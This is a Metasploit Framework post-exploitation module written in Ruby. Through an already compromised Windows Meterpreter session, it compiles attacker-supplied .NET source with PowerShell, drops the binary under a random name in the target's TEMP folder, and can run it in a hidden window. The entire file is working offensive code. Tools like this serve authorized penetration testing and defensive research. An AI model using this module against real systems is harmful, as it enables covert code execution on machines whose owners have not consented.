metasploit-framework/modules/post/windows/manage/powershell/build_net_code.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  Rank = ExcellentRanking

  include Msf::Post::Windows::Powershell
  include Msf::Exploit::Powershell::DotNet

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Powershell .NET Compiler',
        'Description' => %q{
          This module will build a .NET source file using powershell. The compiler builds
          the executable or library in memory and produces a binary. After compilation the
          PowerShell session can also sign the executable if provided a path the
          a .pfx formatted certificate. Compiler options and a list of assemblies
          required can be configured in the datastore.
        },
        'License' => MSF_LICENSE,
        'Author' => 'RageLtMan <rageltman[at]sempervictus>',
        'Platform' => [ 'windows' ],
        'SessionTypes' => [ 'meterpreter' ],
        'DisclosureDate' => '2012-08-14',
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_fs_stat
              stdapi_sys_config_getenv
              stdapi_sys_config_getsid
              stdapi_sys_process_execute
            ]
          }
        }
      )
    )

    register_options(
      [
        OptPath.new('SOURCE_FILE', [true, 'Path to source code']),
        OptBool.new('RUN_BINARY', [false, 'Execute the generated binary', false]),
        OptString.new('ASSEMBLIES', [false, 'Any assemblies outside the defaults', 'mscorlib.dll, System.dll, System.Xml.dll, System.Data.dll' ]),
        OptString.new('OUTPUT_TARGET', [false, 'Name and path of the generated binary, default random, omit extension' ]),
        OptString.new('COMPILER_OPTS', [false, 'Options to pass to compiler', '/optimize']),
        OptString.new('CODE_PROVIDER', [true, 'Code provider to use', 'Microsoft.CSharp.CSharpCodeProvider'])
      ], self.class
    )
    register_advanced_options(
      [
        OptString.new('NET_CLR_VER', [false, 'Minimum NET CLR version required to compile', '4.0'])
      ], self.class
    )
  end

  def run
    # Make sure we meet the requirements before running the script
    unless session.type == 'meterpreter' || have_powershell?
      print_error 'Incompatible Environment'
      return 0
    end

    # Havent figured this one out yet, but we need a PID owned by a user, can't steal tokens either
    if client.sys.config.is_system?
      print_error 'Cannot run as system'
      return 0
    end

    # End of file marker
    eof = Rex::Text.rand_text_alpha(8)
    env_suffix = Rex::Text.rand_text_alpha(8)
    net_com_opts = {}
    net_com_opts[:target] =
      datastore['OUTPUT_TARGET'] ||
      "#{session.sys.config.getenv('TEMP')}\\#{Rex::Text.rand_text_alpha(rand(8..15))}.exe"
    net_com_opts[:com_opts] = datastore['COMPILER_OPTS']
    net_com_opts[:provider] = datastore['CODE_PROVIDER']
    net_com_opts[:assemblies] = datastore['ASSEMBLIES']
    net_com_opts[:net_clr] = datastore['NET_CLR_VER']
    net_com_opts[:cert] = datastore['CERT_PATH']

    begin
      net_com_opts[:harness] = ::File.read(datastore['SOURCE_FILE'])
      script = dot_net_compiler(net_com_opts)
      if datastore['Powershell::Post::dry_run']
        print_good "Compiler code:\n#{script}"
        return
      end
    rescue StandardError => e
      print_error e
      return
    end

    vprint_good "Writing to #{net_com_opts[:target]}"

    # Execute the powershell script
    print_status 'Building remote code.'
    cmd_out, running_pids, open_channels = execute_script(script, true)
    get_ps_output(cmd_out, eof)
    vprint_good "Cleaning up #{running_pids.join(', ')}"

    clean_up(nil, eof, running_pids, open_channels, env_suffix, false)

    # Check for result
    begin
      size = session.fs.file.stat(net_com_opts[:target].gsub('\\', '\\\\')).size
      print_good "File #{net_com_opts[:target].gsub('\\', '\\\\')} found, #{size}kb"
    rescue StandardError
      print_error "File #{net_com_opts[:target].gsub('\\', '\\\\')} not found," \
                  " NET CLR version #{datastore['NET_CLR_VER']} possibly not available"
      return
    end

    # Run the result
    if datastore['RUN_BINARY']
      cmd_out = session.sys.process.execute(net_com_opts[:target].gsub('\\', '\\\\'),
                                            nil, 'Hidden' => true, 'Channelized' => true)
      while (out = cmd_out.channel.read)
        print_good out
      end
    end

    print_good 'Finished!'
  end
end